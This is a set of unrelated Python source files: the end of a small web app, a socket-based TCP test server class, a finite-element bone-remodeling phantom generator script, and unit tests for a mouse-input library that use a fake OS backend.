    """Debug helper: block for five seconds with log markers."""
    print("sleep")
    time.sleep(5)
    print("sleep---")


if __name__ == "__main__":
    # http://127.0.0.1:80/
    app.run(port=80)
# --- file: server.py ---
"""TCP Server module.""" import time import socket import select import threading from testplan.common.utils.timing import wait class Server(object): """ A server that can send and receive messages based on socket interface. Supports multiple connections. :param host: The host address the server is bound to. :type host: ``str`` :param port: The port the server is bound to. :type port: ``str`` or ``int`` :param listen: Socket listen argument. :type listen: ``int`` """ def __init__(self, host="localhost", port=0, listen=1): self._input_host = host self._input_port = port self._listen = listen self._ip = None self._port = None self._listening = False self._server = None self._server_thread = None self._lock = threading.Lock() self._connection_by_fd = {} self._fds = {} self.active_connections = 0 self.accepted_connections = 0 @property def host(self): """Input host provided.""" return self._input_host @property def ip(self): """IP retrieved from socket.""" return self._ip @property def port(self): """Port retrieved after binding.""" return self._port @property def socket(self): """ Returns the underlying ``socket`` object """ return self._server def bind(self): """Bind to a socket.""" self._server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if self._input_port != 0: self._server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self._server.bind((self._input_host, self._input_port)) self._ip, self._port = self._server.getsockname() def serve(self, loop_sleep=0.005, listening_timeout=5): """Start serving connections.""" self._server_thread = threading.Thread( target=self._serving, kwargs=dict(loop_sleep=loop_sleep) ) self._server_thread.daemon = True self._server_thread.start() wait(lambda: self._listening, listening_timeout, raise_on_timeout=True) def _serving(self, loop_sleep=0.005): """Listen for new inbound connections.""" self._server.listen(self._listen) self._listening = True inputs = [self._server] outputs = [] while self._listening: try: readable, 
writable, exceptional = select.select( inputs, outputs, inputs ) except ValueError: for sock in inputs: # Remove the closed socks. if sock.fileno() == -1: inputs.remove(sock) continue for sock in readable: if sock is self._server: # New connection conn, client_addr = sock.accept() inputs.append(conn) self._connection_by_fd[conn.fileno()] = conn self._fds[self.active_connections] = conn.fileno() self.active_connections += 1 for sock in exceptional: inputs.remove(sock) sock.close() time.sleep(loop_sleep) self._remove_all_connections() try: self._server.shutdown(socket.SHUT_RDWR) except: pass self._server.close() def accept_connection(self, timeout=10, accept_connection_sleep=0.1): """ Accepts a connection in the order in which they were received. Return the index of the connection, which can be used to send and receive messages using that connection. If no connection is already available or becomes available in the given timeout, then the method returns -1. :param timeout: Timeout to wait for receiving connection. :type timeout: ``int`` :param accept_connection_sleep: Sleep time to retry accept connection. :type accept_connection_sleep: ``float`` :return: Index of connection :rtype: ``int`` """ started = time.time() while True: if self.accepted_connections in self._fds: self.accepted_connections += 1 return self.accepted_connections - 1 if time.time() > started + timeout: return -1 time.sleep(accept_connection_sleep) def close_connection(self, conn_idx): """ Unregister, close and remove connection with given connection index :param conn_idx: Connection index of connection to be removed :type conn_idx: ``int`` :return: ``None`` :rtype: ``NoneType`` """ fdesc = self._fds[conn_idx] self._connection_by_fd[fdesc].close() del self._connection_by_fd[fdesc] del self._fds[conn_idx] def receive( self, size=1024, conn_idx=None, timeout=30, wait_full_size=True ): """ Receive a message of given size (number of bytes) from the given connection. 
:param size: Number of bytes to receive :type size: ``int`` :param conn_idx: Index of connection to receive from :type conn_idx: ``int`` :param timeout: timeout in seconds :type timeout: ``int`` :param wait_full_size: Wait until full size is received. :type wait_full_size: ``bool`` :return: message received :rtype: ``bytes`` """ conn_idx = self._validate_connection_idx(conn_idx) # Get file descriptor and details of connection fdesc = self._fds[conn_idx] connection = self._connection_by_fd[fdesc] connection.settimeout(timeout) if wait_full_size is False: connection.settimeout(0) msg = connection.recv(size) connection.settimeout(timeout) else: with self._lock: msg = b"" try: while len(msg) < size: new_msg = connection.recv(size - len(msg)) if not new_msg: raise Exception("Socket connection broken") msg += new_msg except socket.error: if timeout == 0: raise socket.timeout() raise return msg def send(self, msg, conn_idx=None, timeout=30): """ Send the given message through the given connection. :param msg: message to be sent :type msg: ``bytes`` :param conn_idx: Index of connection to send to :type conn_idx: ``int`` :param timeout: Timeout in seconds for sending all bytes :type timeout: ``int`` :return: Number of bytes sent :rtype: ``int`` """ conn_idx = self._validate_connection_idx(conn_idx) connection = self._connection_by_fd[self._fds[conn_idx]] connection.settimeout(timeout) with self._lock: connection.sendall(msg) return len(msg) def close(self): """Closes the server and listen thread.""" self._listening = False # self._serving may be stuck in select.select if self._server_thread: self._server_thread.join(timeout=0.1) def _validate_connection_idx(self, conn_idx): """ Check if given connection index is valid. If this is None, then the connection defaults to the one and only existing active connection. If there are more active connections or the initial connection is no longer valid this will fail. 
:param conn_idx: Index of connection to send to :type conn_idx: ``int`` :return: Connection index to send message to :rtype: ``int`` """ if conn_idx is None: if self.accepted_connections > 1: conn_idx = self.accepted_connections - 1 else: conn_idx = 0 if self.accepted_connections == 0: raise Exception("No connection accepted") if conn_idx not in self._fds: raise Exception("Connection {} not active".format(conn_idx)) return conn_idx def _remove_all_connections(self): """ Unregister, close and remove all existing connections :return: ``None`` :rtype: ``NoneType`` """ for fdesc in self._connection_by_fd: self._connection_by_fd[fdesc].close() self._connection_by_fd = {} self._fds = {}
# === file: example_topop_tb_v3_2.py ===
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 9 02:58:30 2021

@author: qcao

v2 - denser structures
"""

import os
import sys
sys.path.append('../') # use bonebox from source without having to install/build

from bonebox.phantoms.TrabeculaeVoronoi import *
from bonebox.FEA.fea import *

import numpy as np
import matplotlib.pyplot as plt
from matplotlib import colors

import vtk
from pyvistaqt import BackgroundPlotter
from skimage.morphology import ball, closing, binary_dilation, binary_closing

import pyvista as pv
pv.set_plot_theme("document")

def generateLDPhantom(Ul, randState, saveNameAppend):
    """
    Generate one trabecular-bone phantom by iterative stress-driven
    remodeling (add voxels above Uu, resorb below Ul) of a Voronoi scaffold.

    :param Ul: lower von Mises stress threshold for voxel resorption
        (the upper threshold Uu is fixed at 0.8 below).
    :param randState: random seed for the Voronoi seed perturbation; also
        embedded in the output folder name.
    :param saveNameAppend: string appended to the output folder name.
    :return: (out_dir, out_bvf, out_elasticModulus) from the final iteration.
    """

    #%% Helper functions

    def volume2mesh(volume, dimXYZ, voxelSize):
        """
        Returns node (in abs coordinates) and elements corresponding to volume.
        """
        nodes, elements = Voxel2HexaMeshIndexCoord(volume)
        nodes = Index2AbsCoords(nodes, volumeSizeVoxels=dimXYZ, voxelSize=voxelSize)
        return nodes, elements

    def extractStresses(feaResult, dimXYZ, voxelSize):
        """
        Runs FEA on nodes and elements.
        """
        # Take absolute stresses
        arrayVM = feaResult["elementVMstresses"].flatten()
        arrayXX = np.abs(feaResult["elementStresses"][:,0])
        arrayYY = np.abs(feaResult["elementStresses"][:,1])
        arrayZZ = np.abs(feaResult["elementStresses"][:,2])

        # Convert to indexing coordinates, assign to voxels
        # NOTE(review): reads `nodes`/`elements`/`volumeSizeVoxels` from the
        # enclosing scope rather than its arguments - confirm intended.
        nodesIndexCoord = Abs2IndexCoords(nodes, dimXYZ, voxelSize=voxelSize, origin=(0,0,0))
        volumeVM = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayVM)
        volumeXX = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayXX)
        volumeYY = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayYY)
        volumeZZ = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayZZ)

        xyz = nodes[elements,:][:,0,:] + 0.5

        return xyz, arrayVM, arrayXX, arrayYY, arrayZZ, volumeVM, volumeXX, volumeYY, volumeZZ

    # Volume update
    def setVoxelsOne(volume, xyz):
        # In-place: sets voxels at coordinates xyz (N x 3) to 1.
        volume[tuple(xyz.T)] = 1
        return volume

    def setVoxelsZero(volume, xyz):
        # In-place: sets voxels at coordinates xyz (N x 3) to 0.
        volume[tuple(xyz.T)] = 0
        return volume

    def setNanToZero(x):
        # In-place: replaces NaNs (e.g. from failed FEA elements) with 0.
        x[np.isnan(x)] = 0
        return x

    def stressStrainVolume2StrainEnergyDensity(stress, strain, volume):
        """
        For linear isotropic materials undergoing small strains.

        stress/strain (Nelements x 6) where for each row components are
        [xx, yy, zz, xy, yz, xz]

        Helpful link: http://homepages.engineering.auckland.ac.nz/~pkel015/SolidMechanicsBooks/Part_I/BookSM_Part_I/08_Energy/08_Energy_02_Elastic_Strain_Energy.pdf
        """
        strainEnergyDensity = 0.5 * np.sum(stress[:,:3] * strain[:,:3],axis=1) \
            + np.sum(stress[:,3:] * strain[:,3:],axis=1)
        return strainEnergyDensity

    def strainEnergyDensity2ProbabilityLinear(strainEnergyDensity, s0, slope, pmin=-1., pmax=1):
        """
        Computes the probability of bone removal/addition given its strain
        energy, based on lazy model.

        Christen et al. Bone remodelling in humans is load-driven but not lazy.

        strainEnergyDensity: np.array of voxel stress values
        s0 (scalar): stress level corresponding to homeostasis
        slope (scalar): slope of increasing probability of addition wrt stress
        pmin, pmax: minimum and maximum probability of voxel removal/addition
        """
        prob = slope * (strainEnergyDensity - s0)
        return np.clip(prob, -1, 1)

    def strainEnergy2ProbabilityLazy(strainEnergyDensity, Ul, Uu, Ce):
        """
        Computes probability of bone removal/addition given its strain energy,
        based on lazy model.

        Nowak et al. New aspects of the trabecular bone remodeling regulatory
        model resulting from shape optimization studies.

        Note that output is not Elastic modulus but a probability of voxel
        undergoing remodeling.
        """
        prob = np.zeros(strainEnergyDensity.shape)
        prob[strainEnergyDensity>Uu] = Ce*(strainEnergyDensity - Uu)
        # NOTE(review): since Uu > Ul, this second assignment overwrites the
        # first for all elements > Uu; the condition was presumably meant to
        # be `< Ul` (resorption branch) - confirm. Helper is unused below.
        prob[strainEnergyDensity>Ul] = Ce*(strainEnergyDensity - Ul)
        return np.clip(prob, -1, 1)

    def strainEnergy2MaskLazyDiscrete(strainEnergyDensity, Ul, Uu):
        """
        Computes probability of bone removal/addition given its strain energy,
        based on lazy model.

        Nowak et al. New aspects of the trabecular bone remodeling regulatory
        model resulting from shape optimization studies.

        Returns a mask of +1 (deposit, above Uu), -1 (resorb, below Ul),
        0 (lazy zone, unchanged).
        """
        mask = np.zeros(strainEnergyDensity.shape, dtype=int)
        mask[strainEnergyDensity>Uu] = 1
        mask[strainEnergyDensity<Ul] = -1
        return mask

    def sampleProbabilityAddRemove(prob, randState):
        """
        Generates output array with +1 denoting addition, -1 denoting removal,
        and 0 denoting no change, given probabilities defined in prob.
        """
        # Generate uniform distribution in (-1,1)
        mask = sampleUniformZeroOne(prob.shape, randState=randState) * 2 - 1
        mask[(prob>0)&(mask<prob)] = 1
        mask[(prob<0)&(mask>prob)] = -1
        mask[(mask!=-1)&(mask!=1)] = 0
        return mask

    def volumeVoxelGrowRemove(volume, xyz, mask):
        """
        Add (8-neighborhood) voxels in a volume according to mask. Remove.

        Parameters
        ----------
        volume : Integer array of 0 and 1's
            Initial Volume.
        xyz : tuple of 3 arrays
            tuple denoting coordinates cooresponding to mask
        mask : Voxels to add (+1) and voxel to remove (-1)

        Returns
        -------
        volume.
        """
        # Neighborhood (6-connected 3D ball)
        # nbh = ball(1)
        nbh = np.ones((3,3,3))

        # Convert voxel coordinates to volume (TODO: not needed, refactor later)
        dvolume = np.zeros(volume.shape, dtype=int)
        dvolume[xyz] = mask

        # Assign voxels to be added (dilated so deposits grow into neighbors)
        volumeAdd = (dvolume==1)
        volumeAdd = binary_dilation(volumeAdd,nbh)
        volume[volumeAdd==1] = 1

        # Assign voxels to be removed (removal is NOT dilated)
        volumeRemove = (dvolume==-1)
        volume[volumeRemove==1] = 0

        return volume

    #%%

    #% Make base structure

    # Parameters for generating phantom mesh
    Sxyz, Nxyz = (5,5,7.5), (6,6,9) # volume extent in XYZ (mm), number of seeds along XYZ
    Rxyz = 0.25
    dilationRadius = 3 # (voxels)
    randState = randState # for repeatability # 1, 2, 3
    morphClosingMask = np.ones((3,3,3)) # mask for morphological closing

    # Parameters for generating phantom volume
    volumeSizeVoxelsInitial = (100,100,150)
    voxelSize = np.array(Sxyz) / np.array(volumeSizeVoxelsInitial)

    # FEA parameters
    plattenThicknessVoxels = 2 # voxels
    elasticModulus = 17e9
    poissonRatio = 0.3
    forceTotal = 1.

    # Generate faces and edges
    points = makeSeedPointsCartesian(Sxyz, Nxyz)
    ppoints = perturbSeedPointsCartesianUniformXYZ(points, Rxyz, randState=randState)
    vor, ind = applyVoronoi(ppoints, Sxyz)
    uniqueEdges, uniqueFaces = findUniqueEdgesAndFaces(vor, ind)

    # Compute edge cosines
    edgeVertices = getEdgeVertices(vor.vertices, uniqueEdges)
    edgeCosines = computeEdgeCosine(edgeVertices, direction = (0,0,1))

    # Compute face properties
    faceVertices = getFaceVertices(vor.vertices, uniqueFaces)
    faceAreas = computeFaceAreas(faceVertices)
    faceCentroids = computeFaceCentroids(faceVertices)
    faceNormas = computeFaceNormals(faceVertices)

    # Make edge volume
    uniqueFacesRetain = uniqueFaces
    volumeFaces = makeSkeletonVolumeFaces(vor.vertices, uniqueFacesRetain, voxelSize, volumeSizeVoxelsInitial)

    # Crop and Morphological closing on volume of edges
    volume = volumeFaces[:,:,25:125]
    volumeSizeVoxels = volume.shape
    # volume = binary_dilation(volume, morphDilationMask)
    volume = binary_closing(volume, morphClosingMask)
    volume = addPlatten(volume, plattenThicknessVoxels)

    # General optimization parameters
    Niters = 8

    # Run Indicators
    iterVoxelsChanged = np.zeros(Niters)
    iterVoxelsTotal = np.zeros(Niters)
    iterElasticModulus = np.zeros(Niters)

    # Adaptation parameters, assume intercept of -1 for 0 stress
    # using VM stress instead
    Ul = Ul # 0.1 and 0.2
    Uu = 0.8

    # Make output directory
    out_dir = "/data/BoneBox-out/topopt/lazy_v3_sweep/randstate_"+str(randState)+saveNameAppend+"/"
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)

    #% Iteratively perform FEA and augment volume shape

    np.save(out_dir+"volume_"+str(0), volume)

    for fea_iter in np.arange(Niters):

        # Save original volume at the start of iteration
        volume0 = volume.copy()

        # Convert to hex mesh for FEA
        volume = addPlatten(volume, plattenThicknessVoxels)
        nodes, elements = Voxel2HexaMeshIndexCoord(volume)
        nodes = Index2AbsCoords(nodes, volumeSizeVoxels, voxelSize=voxelSize)

        # Finite element analysis
        feaResult = computeFEACompressLinearHex(nodes, elements, plateThickness=plattenThicknessVoxels * voxelSize[0], \
                                                elasticModulus=elasticModulus, poissonRatio=poissonRatio, \
                                                force_total = forceTotal, solver="ParadisoMKL")

        # Compute elastic modulus
        # NOTE(review): this overwrites the material constant
        # `elasticModulus` used as FEA input above - on the next iteration
        # the FEA runs with the *apparent* modulus. Confirm intended.
        elasticModulus = computeFEAElasticModulus(feaResult)
        iterElasticModulus[fea_iter] = elasticModulus
        print("Elastic Modulus:" + str(elasticModulus))

        # Index coordinates of elements (voxel centers)
        nodesIndexCoord = Abs2IndexCoords(nodes, volumeSizeVoxels, voxelSize=voxelSize, origin=(0,0,0))
        xyz = (nodesIndexCoord[elements,:][:,0,:] + 0.5).astype(int)
        xyzTuple = tuple(xyz.T)

        # Take absolute stresses
        arrayVM = setNanToZero(feaResult["elementVMstresses"].flatten())
        arrayXX = setNanToZero(np.abs(feaResult["elementStresses"][:,0]))
        arrayYY = setNanToZero(np.abs(feaResult["elementStresses"][:,1]))
        arrayZZ = setNanToZero(np.abs(feaResult["elementStresses"][:,2]))

        # print("median strain energy:"+str(np.median(strainEnergyDensity)))
        print("median VM Stress:"+str(np.median(arrayVM)))

        # If MKL fails, will generate unlikely distribution
        if (np.median(arrayVM)>3.) or (np.median(arrayVM)<1e-3): # median VM stress implausibly large or small
            raise ValueError('MKL Solver probably failed, terminating this run')

        # Compute strain energy, probability, (using VM stress instead here)
        mask = strainEnergy2MaskLazyDiscrete(arrayVM, Ul, Uu)
        volume1 = volumeVoxelGrowRemove(volume, xyzTuple, mask)
        volume1 = addPlatten(volume1, plattenThicknessVoxels)

        # Convert to indexing coordinates, assign to voxels
        volumeVM = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayVM)
        volumeXX = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayXX)
        volumeYY = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayYY)
        volumeZZ = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, arrayZZ)
        # volumeSED = HexaMeshIndexCoord2VoxelValue(nodesIndexCoord, elements, volumeSizeVoxels, strainEnergyDensity)

        #% Show volume slice (sagittal)
        dvolume = volume1.astype(int)-volume0.astype(int)
        volumeShow = np.zeros(volume.shape).astype(int)
        volumeShow[volume0==1] = 2
        volumeShow[dvolume==-1] = 1
        volumeShow[dvolume==1] = 3

        # make a color map of fixed colors
        cmap = colors.ListedColormap(['white','red','gray','blue'])
        bounds=[-0.5, 0.5, 1.5, 2.5, 3.5]
        norm = colors.BoundaryNorm(bounds, cmap.N)

        fig = plt.figure(frameon=False)
        plt.imshow(volumeShow[:,50,:].T, cmap=cmap, norm=norm)
        plt.axis("off")
        plt.axis("tight")
        plt.savefig(out_dir+"vol_slice50_"+str(fea_iter)+".png")
        plt.close("all")

        #% Show mask histogram
        Nresorpt = np.sum(mask==-1)
        Ndeposit = np.sum(mask==1)
        Nunchanged = np.sum(mask==0)

        plt.bar([1,2,3],[Nresorpt,Nunchanged,Ndeposit])
        plt.xticks([1,2,3], ["Resorpt", "Unchanged","Deposit"])
        plt.savefig(out_dir+"dvolhist_slice50_"+str(fea_iter)+".png",bbox_inches='tight')
        plt.close("all")

        #% Visualize stress histogram
        fig_vm = np.linspace(0.001,5,1000)
        fig_p = strainEnergy2MaskLazyDiscrete(fig_vm, Ul, Uu)
        # fig_p = strainEnergyDensity2ProbabilityLinear(fig_vm, s0, slope, pmin=-1., pmax=1)

        fig, ax1 = plt.subplots()
        ax1.hist(arrayVM,bins=fig_vm)
        ax1.set_xlabel('Von Mises Stress (MPa)')
        ax1.set_ylabel('# Elements (Voxels)')
        ax2 = ax1.twinx()
        plt.plot(fig_vm,fig_p,'r--')
        ax2.set_ylabel('Deposition/Resorption Probability')
        plt.savefig(out_dir+"hist_"+str(fea_iter)+".png",bbox_inches='tight')
        plt.close("all")

        #% Hexamesh Visualizer
        # https://docs.pyvista.org/examples/00-load/create-unstructured-surface.html

        cpos = [(-22.333459061472976, 23.940062547377757, 1.7396451897739171),
                (-0.04999999999999982, -0.04999999999999982, -0.04999999999999982),
                (0.037118979271661946, -0.040009842455482315, 0.9985095862757241)]
        cmap = plt.cm.get_cmap("viridis", 512)

        # Each cell begins with the number of points in the cell and then the points composing the cell
        points = nodes
        cells = np.concatenate([(np.ones(elements.shape[0],dtype="int64")*8)[:,None], elements],axis=1).ravel()
        celltypes = np.repeat(np.array([vtk.VTK_HEXAHEDRON]), elements.shape[0])
        offset = np.arange(elements.shape[0])*9

        # NOTE(review): the `offset` positional argument is only accepted by
        # older pyvista releases - confirm the pinned pyvista version.
        grid = pv.UnstructuredGrid(offset, cells, celltypes, points)

        pl = pv.Plotter(off_screen=True)
        pl.add_mesh(grid,show_edges=True, scalars=arrayVM, cmap=cmap, clim=(0,1))
        pl.show(window_size=(3000,3000),cpos=cpos,screenshot=out_dir+"volume_"+str(fea_iter)+".png")

        # Save final phantom, both in volume and in mesh form
        np.save(out_dir+"volume_"+str(fea_iter+1), volume1)
        np.save(out_dir+"arrayVM_"+str(fea_iter), arrayVM)
        np.save(out_dir+"xyz"+str(fea_iter), xyz)

        # Save input parameters
        np.save(out_dir+"xyz"+str(fea_iter), xyz)

        # Output phantom properties (for BVF crop to avoid edge effects and platten).
        cropped_volume = volume1[15:85,15:85,15:85]
        out_bvf = np.sum(cropped_volume==1) / np.prod(cropped_volume.shape)
        out_elasticModulus = iterElasticModulus[-1]

        # Save BVF and Elastoc Modulus in seperate folders
        np.save(out_dir+"bvf"+str(fea_iter), out_bvf)
        np.save(out_dir+"elasticModulus"+str(fea_iter), out_elasticModulus)

    del volume, volume0, volume1, feaResult

    return out_dir, out_bvf, out_elasticModulus

if __name__ == "__main__":

    import gc
    import os
    import psutil
    import signal

    # Try to launch function in seperate process to release unreachable memeory
    from multiprocessing import Process, Queue

    save_dir = "/data/BoneBox-out/topopt/lazy_v3_sweep/"
    if not os.path.exists(save_dir):
        os.makedirs(save_dir)

    # Generate N phantom series, 3 resorption intensities per series
    Nseries = 400
    Nresorption = 3

    # Track BVF and Elastic Moduli
    if os.path.exists(save_dir+"bvfs.npy"):
        bvfs = np.load(save_dir+"bvfs.npy")
    else:
        bvfs = np.zeros((Nseries, Nresorption)); bvfs[:] = np.nan
    if os.path.exists(save_dir+"Es.npy"):
        Es = np.load(save_dir+"Es.npy")
    else:
        Es = np.zeros((Nseries, Nresorption)); Es[:] = np.nan

    # Track Exception
    exceptedInstances = np.zeros((Nseries, Nresorption),dtype=bool)

    # Generate array of random Uls (between 0.1 and 0.25)
    randStateUls = 3012
    Ulmin = 0.1
    Ulmax = 0.25
    Uls = sampleUniformZeroOne(((Nseries,Nresorption)), randState=randStateUls)*(Ulmax-Ulmin) + Ulmin

    # Save input parameters
    np.save(save_dir+"Uls", Uls)
    np.save(save_dir+"randStateUls", randStateUls)

    # Generate array of random seeds for scaffolding
    scaffoldSeeds = np.arange(Nseries,dtype=int)

    #%% Loop

    # NOTE(review): only series 28 is run here (slice [28:29]); widen the
    # slice to regenerate the full sweep.
    for ss in scaffoldSeeds[28:29]:
        for uu in range(Nresorption):

            print("==>> Phantom "+str(ss))
            print("Ul="+str(Uls[ss,uu]))

            # String appended to the end of folder name
            saveNameAppend = "_phantom_ss_"+str(ss)+"_uu_"+str(uu)

            # Run in a child process so the MKL solver's memory is released
            # when the process exits.
            p = Process(target=generateLDPhantom, args=(Uls[ss,uu], ss, saveNameAppend))
            p.start()
            p.join()

            # # Catch failed mkl solutions
            # try:
            #     # out_dir, BVF, elasticModulus = generateLDPhantom(Uls[ss,uu], ss, saveNameAppend)
            #     p = Process(generateLDPhantom, args=(Uls[ss,uu], ss, saveNameAppend))
            #     p.start()
            #     p.join()
            #     gc.collect()
            #     # print("BVF="+str(BVF))
            #     # print("elasticModulus="+str(elasticModulus))
            #     # bvfs[ss,uu] = BVF
            #     # Es[ss,uu] = elasticModulus
            #     # np.save(save_dir+"bvfs", bvfs)
            #     # np.save(save_dir+"Es", Es)
            # except:
            #     print("MKL solver failed... moving on")
            #     exceptedInstances[ss,uu] = True
            #     # np.save(out_dir+"excepted", True)

            #% Remove all other processes other than main (persistent mkl kernels not ending)
            # currentId = os.getpid()
            # allPyIds = [p.pid for p in psutil.process_iter() if "python" in str(p.name)]
            # PyIdsToKill = [x for x in allPyIds if x != currentId]
            # for PyId in PyIdsToKill:
            #     os.kill(PyId, signal.SIGTERM)

    #%%

    # ss = seed = 16; uu = 2

    # print("==>> Phantom "+str(ss))
    # print("Ul="+str(Uls[ss,uu]))

    # # String appended to the end of folder name
    # saveNameAppend = "_phantom_ss_"+str(ss)+"_uu_"+str(uu)

    # try:
    #     out_dir, BVF, elasticModulus = generateLDPhantom(Uls[ss,uu], seed, saveNameAppend)
    #     print("BVF="+str(BVF))
    #     print("elasticModulus="+str(elasticModulus))
    #     bvfs[ss,uu] = BVF
    #     Es[ss,uu] = elasticModulus
    #     np.save(save_dir+"bvfs", bvfs)
    #     np.save(save_dir+"Es", Es)
    # except:
    #     print("MKL solver failed... moving on")
# === file: _mouse_tests.py ===
# -*- coding: utf-8 -*-
import unittest
import time

from ._mouse_event import MoveEvent, ButtonEvent, WheelEvent, LEFT, RIGHT, MIDDLE, X, X2, UP, DOWN, DOUBLE

from keyboard import mouse

class FakeOsMouse(object):
    """
    Fake OS-level mouse backend: records simulated actions into an external
    list (``self.append``) instead of touching the real mouse, so the
    higher-level ``mouse`` module can be tested deterministically.
    """
    def __init__(self):
        # ``append`` is injected by the test (a list's append method).
        self.append = None
        self.position = (0, 0)
        self.queue = None
        self.init = lambda: None

    def listen(self, queue):
        self.listening = True
        self.queue = queue

    def press(self, button):
        self.append((DOWN, button))

    def release(self, button):
        self.append((UP, button))

    def get_position(self):
        return self.position

    def move_to(self, x, y):
        self.append(('move', (x, y)))
        self.position = (x, y)

    def wheel(self, delta):
        self.append(('wheel', delta))

    def move_relative(self, x, y):
        self.position = (self.position[0] + x, self.position[1] + y)

class TestMouse(unittest.TestCase):
    """Tests for the ``mouse`` module against the fake OS backend above."""

    @staticmethod
    def setUpClass():
        # Swap the real OS hook for the fake before the listener starts.
        mouse._os_mouse= FakeOsMouse()
        mouse._listener.start_if_necessary()
        assert mouse._os_mouse.listening

    def setUp(self):
        # ``self.events`` collects simulated OS-level actions per test.
        self.events = []
        mouse._pressed_events.clear()
        mouse._os_mouse.append = self.events.append

    def tearDown(self):
        mouse.unhook_all()
        # Make sure there's no spill over between tests.
        self.wait_for_events_queue()

    def wait_for_events_queue(self):
        # Block until the listener thread has processed all queued events.
        mouse._listener.queue.join()

    def flush_events(self):
        self.wait_for_events_queue()
        events = list(self.events)
        # Ugly, but required to work in Python2. Python3 has list.clear
        del self.events[:]
        return events

    # --- helpers that inject fake incoming OS events -----------------------

    def press(self, button=LEFT):
        mouse._os_mouse.queue.put(ButtonEvent(DOWN, button, time.time()))
        self.wait_for_events_queue()

    def release(self, button=LEFT):
        mouse._os_mouse.queue.put(ButtonEvent(UP, button, time.time()))
        self.wait_for_events_queue()

    def double_click(self, button=LEFT):
        mouse._os_mouse.queue.put(ButtonEvent(DOUBLE, button, time.time()))
        self.wait_for_events_queue()

    def click(self, button=LEFT):
        self.press(button)
        self.release(button)

    def wheel(self, delta=1):
        mouse._os_mouse.queue.put(WheelEvent(delta, time.time()))
        self.wait_for_events_queue()

    def move(self, x=0, y=0):
        mouse._os_mouse.queue.put(MoveEvent(x, y, time.time()))
        self.wait_for_events_queue()

    # --- tests -------------------------------------------------------------

    def test_hook(self):
        events = []
        self.press()
        mouse.hook(events.append)
        self.press()
        mouse.unhook(events.append)
        self.press()
        self.assertEqual(len(events), 1)

    def test_is_pressed(self):
        self.assertFalse(mouse.is_pressed())
        self.press()
        self.assertTrue(mouse.is_pressed())
        self.release()
        self.press(X2)
        self.assertFalse(mouse.is_pressed())
        self.assertTrue(mouse.is_pressed(X2))
        self.press(X2)
        self.assertTrue(mouse.is_pressed(X2))
        self.release(X2)
        self.release(X2)
        self.assertFalse(mouse.is_pressed(X2))

    def test_buttons(self):
        mouse.press()
        self.assertEqual(self.flush_events(), [(DOWN, LEFT)])
        mouse.release()
        self.assertEqual(self.flush_events(), [(UP, LEFT)])
        mouse.click()
        self.assertEqual(self.flush_events(), [(DOWN, LEFT), (UP, LEFT)])
        mouse.double_click()
        self.assertEqual(self.flush_events(), [(DOWN, LEFT), (UP, LEFT), (DOWN, LEFT), (UP, LEFT)])
        mouse.right_click()
        self.assertEqual(self.flush_events(), [(DOWN, RIGHT), (UP, RIGHT)])
        mouse.click(RIGHT)
        self.assertEqual(self.flush_events(), [(DOWN, RIGHT), (UP, RIGHT)])
        mouse.press(X2)
        self.assertEqual(self.flush_events(), [(DOWN, X2)])

    def test_position(self):
        self.assertEqual(mouse.get_position(), mouse._os_mouse.get_position())

    def test_move(self):
        mouse.move(0, 0)
        self.assertEqual(mouse._os_mouse.get_position(), (0, 0))
        mouse.move(100, 500)
        self.assertEqual(mouse._os_mouse.get_position(), (100, 500))
        mouse.move(1, 2, False)
        self.assertEqual(mouse._os_mouse.get_position(), (101, 502))

        mouse.move(0, 0)
        mouse.move(100, 499, True, duration=0.01)
        self.assertEqual(mouse._os_mouse.get_position(), (100, 499))
        mouse.move(100, 1, False, duration=0.01)
        self.assertEqual(mouse._os_mouse.get_position(), (200, 500))
        mouse.move(0, 0, False, duration=0.01)
        self.assertEqual(mouse._os_mouse.get_position(), (200, 500))

    def triggers(self, fn, events, **kwargs):
        # Registers ``fn`` with a flag-setting callback, replays ``events``,
        # and reports whether the callback fired.
        self.triggered = False
        def callback():
            self.triggered = True
        handler = fn(callback, **kwargs)

        for event_type, arg in events:
            if event_type == DOWN:
                self.press(arg)
            elif event_type == UP:
                self.release(arg)
            elif event_type == DOUBLE:
                self.double_click(arg)
            elif event_type == 'WHEEL':
                self.wheel()

        mouse._listener.remove_handler(handler)
        return self.triggered

    def test_on_button(self):
        self.assertTrue(self.triggers(mouse.on_button, [(DOWN, LEFT)]))
        self.assertTrue(self.triggers(mouse.on_button, [(DOWN, RIGHT)]))
        self.assertTrue(self.triggers(mouse.on_button, [(DOWN, X)]))

        self.assertFalse(self.triggers(mouse.on_button, [('WHEEL', '')]))

        self.assertFalse(self.triggers(mouse.on_button, [(DOWN, X)], buttons=MIDDLE))
        self.assertTrue(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE))
        self.assertTrue(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE))
        self.assertFalse(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE, types=UP))
        self.assertTrue(self.triggers(mouse.on_button, [(UP, MIDDLE)], buttons=MIDDLE, types=UP))

        self.assertTrue(self.triggers(mouse.on_button, [(UP, MIDDLE)], buttons=[MIDDLE, LEFT], types=[UP, DOWN]))
        self.assertTrue(self.triggers(mouse.on_button, [(DOWN, LEFT)], buttons=[MIDDLE, LEFT], types=[UP, DOWN]))
        self.assertFalse(self.triggers(mouse.on_button, [(UP, X)], buttons=[MIDDLE, LEFT], types=[UP, DOWN]))

    def test_ons(self):
        self.assertTrue(self.triggers(mouse.on_click, [(UP, LEFT)]))
        self.assertFalse(self.triggers(mouse.on_click, [(UP, RIGHT)]))
